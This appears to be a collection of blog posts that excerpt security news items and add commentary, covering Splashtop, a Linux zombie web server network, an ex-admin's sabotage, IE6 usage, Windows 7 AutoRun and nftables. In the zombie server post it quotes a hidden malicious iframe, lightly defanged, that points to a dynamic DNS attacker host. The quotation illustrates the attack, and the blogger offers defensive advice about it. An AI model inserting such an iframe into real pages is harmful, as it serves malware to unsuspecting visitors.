DeviceVM Inc. is creating a new version of its instant-on Linux environment, Splashtop, aimed at laptop computers bought and managed by enterprise IT managers.

Splashtop for Business can enable laptops to securely connect to corporate servers using virtual desktop infrastructure (VDI) technology compatible with those from Citrix Systems Inc. and VMware Inc., said Steve Rokov, senior director of enterprise marketing for the company.

Splashtop also includes components letting IT managers remotely set user policies and push out software updates, as well as delete user accounts or wipe data if the laptop is lost or stolen.

Well now this is a definite development. Safe transport and protection of product contents on handhelds and laptops has been a thorny issue for Corporate entities. You can certainly encrypt. So that solves some of the problem. But when the device is stolen and the HD or SDD is removed and placed in another machine the thief has all the time in the world to crack the container. Yes, even TPM can be cracked by someone with sufficient skill.

The SplashTop approach is to VM the whole environment and encapsulate it. That provides a level of control separate from the main OS. No it won’t solve the physical loss unless the IT shop move very quickly. But it does wed the VM contents to the hardware. It ratchets up the skill level of intrusion. The thief now has to have the same mobo family that the BIOS was burned for.

More here.

I really don’t know where to go with this article. Its a critical issue for Linux. Yet it does not look like it is a critical software more than it is improper administration. It has aspects for the client, yet again its not a hole, except for bad security administration again. –

The infected machines observed by Sinegubko serve legitimate traffic on port 80, the standard TCP port used by websites. Behind the scenes, the rogue server sends malicious traffic over port 8080. The malicious payloads are then delivered with the help of dynamic DNS hosting providers, which offer free domain names that are mapped to the IP address of the zombie webserver.

The links look something like this:

<i_frame src=”http ://a86x . homeunix . org:8080/ts/in.cgi?open2″ width=997 height=0 style=”visibility: hidden”></iframe>

They are injected into legitimate websites, so that they are surreptitiously served when users browse the infected page.

“It’s better to have both zombie clients and servers at the same time, Sinegubko wrote in an instant message. “The heterogeneous system provides much more possibilities [and] makes the whole system more flexible.”

It’s unclear exactly how the servers have become infected. Sinegubko speculates they belong to careless administrators who allowed their root passwords to be sniffed. Indeed, the part of the multi-staged attack that plants malicious iframes into legitimate webpages uses FTP passwords that have been stolen using password sniffers. It’s likely the zombie servers were compromised in the same fashion, he explained.

With about 100 nodes, the network is relatively small, making it unclear exactly what the attackers’ intentions are. All of the boxes examined so far have run the Apache webserver on a various distribution of Linux, he said.

“Probably it’s some sort of proof-of-concept thing for hackers,” he wrote. “Or maybe they have many more other compromised servers waiting for their turn.”

So far, Sinegubko said, DynDNS.com and No-IP.com, the two dynamic hosting providers used by the attackers, have been commendably responsive in shutting down domains used in the attack. But he went on to say he is detecting about two new IP addresses every hour, an indication that this may not be the last we’ve heard of the phenomenon. ®

So first. If you have not reviewed your client security policies lately, suggest you do so now. Yes, its a lot of work, but a heck of a lot less than having all your machines trashed. Second on the server side, for those machines running web servers, do a nmap scan. Be alert for any HTTP port 8080. Question any group in your organization doing so as to the rationale of why. With the ease to which VM’s can be built for testing purposes, there really is no reason to be using port 8080 on production machines for test. If you can’t get a valid reason for need, shut it down.

At the code level, one might want to question why one is using iframes at all. There is one camp of web development that even questions the need for iframes if one is doing ‘proper’ CSS design. Something for a later philosophic discussion. But it might be worth the effort to run a script against your code base looking for an iframe with the “hidden:visibility” attribute set.

Last, I have not run across it yet. But a team needs to come up with procedural mapping to prevent these kind of insertions. The hackers are finding machines with vulnerabilities. With the proper procedures in place this can be mitigated. But Linux is only as secure as you make it.

Linky.

A former support admin was sentenced to one year in prison after admitting he shut down the servers of a large IT company a few months after his employment ended there.

Lesmany Nunez, 30, was an employee at Quantum Technology Partners in Miami from August 2006 to May 2007. Amazingly, he was able to breach the company’s network security in August 2007 using an administrator password, according to documents filed in federal court in Miami.

The former employee proceeded to change the passwords of all the IT admins and then shut down most of the company’s servers. He also deleted files that could have used backup tapes to repair some of the damage. The attack shut down Quantum’s network for almost a week, wreaking more than $30,000 in damages, prosecutors said.

His mistake other than he should not have done it to begin with? He did not use a public terminal if at all possible. There is another tale to this as well of course. The firm did not use proper procedures. How could this guy have gotten in unless the IT MIS dude just never deleted the fella’s ID?

Linky.

I once worked with a security genius wose bill rate exceeded that of the top ambulance chasers. He felt that selling security is like selling snake oil…success can be the luck of a draw. Beyond the vast number of recommoedations he typically made, he also had a favorite fix:  Use the stuff most of the rest of the world does not use, therefore improving your odds. In this case, most of the world uses MS Office, making it the most attractive target for people who would use its vulnerabilities to steal from you.

Microsoft Corp warned that cybercriminals have attacked users of its Office software for Windows PCs, exploiting a programing flaw that the software giant has yet to repair.

The world’s largest software maker issued the warning on Tuesday as it released patches to address nine other security holes in its software. (Yahoo)

Is Open Office or one of its variants less vulnerable than the Microsoft suite? Probably not.   There are far fewer people using it, so it’s much less profitable to exploit it. That should be justification enough for you to give it a try.

Remember Clear? You know the company what was going to permit you to jump to the head of the line at the TSA screening stations at airports. Yeah those guys. Well its tits up. They closed their doors yesterday having been unable to reach an agreement with senior creditors.

The idea for Clear was you provided your personal data beforehand so that prescreening did not have to take place. For your forethought you got a chance to bypass all the unwashed and go to the head of the line. Made sense when the lines were first implemented.

The reality is though someone paid a $100 to bypass one single checkpoint. So a Clear customer paid for the right to be first in line to be abused by the TSA. How special. That Clear customer still had take off their shoes, belt, empty their pockets, get hand scanned, etc. So in the end it was a flawed concept.

Linky.

Solid Oak is seeking an injunction against the Chinese developer of Green Dam, Jinhui Computer System Engineering Inc, but its chances of gaining satisfaction must be reckoned to be fairly slim.

So, it’s no surprise it is also seeking injunctions against US PC vendors who follow Beijing’s directive that any machines they ship in China must carry the software.

“They are stealing proprietary copyrighted material from us, sending it over to the US and saying, ‘We want this on all the computers you send us’,” Solid Oak president Brian Milburn told Reuters. “Just because we are a small company doesn’t make the theft of CyberSitter any less [wrong].”

Milburn told Reuters he had been tipped off via an anonymous email. “We found actual proprietary code areas within the Green Dam program itself which are incredibly suspicious because they use our proprietary encryption methods. There’s a lot more to it than just a list of bad words.”

Heinous if true. Not that it would cause the Chinese much heartache. Even if Solid Oak were to when a class wide injunction here in the US the Chinese would just use internal suppliers like Lenovo to meet their needs and continue to use the pirated components.

But very rapidly the bamboo curtain is falling again.

Linky.

Beginning with Release Candidate 1 of Windows 7, the operating system will no longer display AutoRun when most removable media is connected. Up to now, the feature has automatically opened a window each time a drive is connected that presents a list of tasks the user can instruct Windows to carry out. Malware purveyors have long manipulated the feature to display options that say things like “open folder to view files” but install malware when clicked instead.

“With these changes, if you insert a USB flash drive that has photos and has been infected by malware, you can be confident that the tasks displayed are all from software already on your computer,” Arik Cohen, a program manager on the Microsoft’s core user experience team writes here. The changes eventually will be added to Vista and XP.

Excellent move Microsoft. Yes its a minor thing but one that is long over due. The ease of manipulation that that panel offered was a gripe by many a tech.

Nor is this minor peve limited to Microsoft. Ubuntu and other Linux distros will do this too. The saving grace is that Linux is more immune to such attacks.

Linky.

We have railed several times here that folks should be ditching IE 6 for all its security flaws. Well it looks like its working. Companies on the other hand? Well not so much –

This graph is from the folks over at the Washington Times. They are big Open Source adherents. WT has had an ongoing campaign to get folks off IE6. They want to sunset it as a supported platform. Notice the pattern? –

I shaded the weekends to make it more obvious, but there is a regular dip in the percentage of IE6 traffic on weekends with a regular increase of Firefox 3 traffic. My interpretation is that while at work, people are browsing our site using whatever is installed on their work computers: IE 6. But when they are home, they use what they prefer: Firefox 3. Internet Explorer 7 usage is fairly stable.

Some good news is that it appears to be working: IE 6 usage is slowly dropping. However, it also appears that Firefox 3 usage (as a percentage) is dropping. This is probably a conversion of IE 6 to IE 7 usage. There is also evidence that there is some upgrading happening at work as the regular weekend drop is starting to appear in IE 7.

So this is a note to the CEO of all companies. Have you inquired with your technical staff lately as to whether IE6 is in use? You ought to. IE6 is causing your staff massive headaches in being open to worm and virus attacks. So before you approve another malware upgrade get to the root and flush IE 6 first.

Kudo to the Washington Times.

Linky.

No seriously, have you? Ok. Yes. But, ‘communications’ is just such a broad term. I could use email in the same breath. Now think again.

Stumped? How about — Voyeur.

Like Damn, you say. Ok I’ll agree its an extreme example. But it has all the attributes. Observing unseen? Check. Assessing content? Check. A one way event? Check. Has possible social impacts? Check. The only thing that makes Twitter any different is that the person being observed does so voluntarily.

Funny how a highly popular electronic service used by millions elicits no concerns. Were Twitter a physical event in the real world it could be arrested in about half the States of the US. I am just waiting for somebody to write a mobile phone worm that links an anonymous Twitter account to the GPS circuit of the phone.

Hmmmmm.

[Update] For a different view of Twitter and some of its user consider this.

The Netfilter development team’s Patrick McHardy has released an alpha version of nftables, a new firewall implementation for the Linux kernel, with a user space tool for controlling the firewall. nftables introduces a fundamental distinction between the user space defined rules and network objects in the kernel: the kernel component works with generic data such as IP addresses, ports and protocols and provides some generic operations for comparing the values of a packet with constants or for discarding a packet.

Firewall rules, which the user defines with the nft tool, are checked by the nft program for correctness and then translated into the required generic operations and kernel objects. A first impression of the examples in the announcement shows nftables to have a different syntax to iptables. The rules can be added either incrementally on the command line, or read from a file with nft supporting rule files, which can import and include other rules files for easier modularisation.

Dang! Just when I got the IPTables system all figured out!

Seriously, its probably a good change once they get the system stable. The ability to separate system level filter rules from user space rules will be a nice feature. It should make customized server security a tad easier. And I doubt that IPTables is going away anytime soon. Will probably be in the repositories of most major systems for years.

More here.